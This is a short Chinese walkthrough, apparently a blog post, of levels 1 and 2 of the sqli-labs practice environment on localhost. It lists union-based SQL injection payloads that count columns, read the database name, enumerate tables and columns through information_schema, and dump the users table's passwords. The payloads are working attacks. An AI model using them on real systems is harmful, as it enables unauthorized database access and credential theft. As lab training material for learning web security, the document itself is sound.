level1
输入:[http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1](http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1)
后面加一个'
并将后面注释掉试试效果:
构造?id=1' --+
(这里#
被注释了)
然后判断字段数
?id=1' order by 3 --+
order by 3的时候回显正常,order by 4的时候报错,那证明字段就是3个。
然后判断注入点
?id=0' union select 1,2,3 --+
2和3是注入点,随便找个位置开始注入
?id=0' union select 1,database(),3 --+
数据库名爆出来了,security
然后爆表名:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
因为这里只显示一行,虽然后面的LIMIT 0,1被注释掉了,但是后台可能还有其他函数限制输出,所以用group_concat()来将所有输出整在一行内
猜测flag应该在users表中
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
maybe在password字段中
?id=-1' union select 1,group_concat(password),3 from users --+
okok搞定
level2
首先构造?id=1'--+
发现报错,那这个应该不是字符类型
然后判断字段数?id=1 order by 3 --+
然后构造?id=1 union select 1,2,3 --+
发现注入点,接下来的操作跟上一题一样,就不做介绍了,直接贴payload
?id=1 union select 1,database(),3 --+
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security"--+
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
?id=-1 union select 1,group_concat(password),3 from users --+
网友评论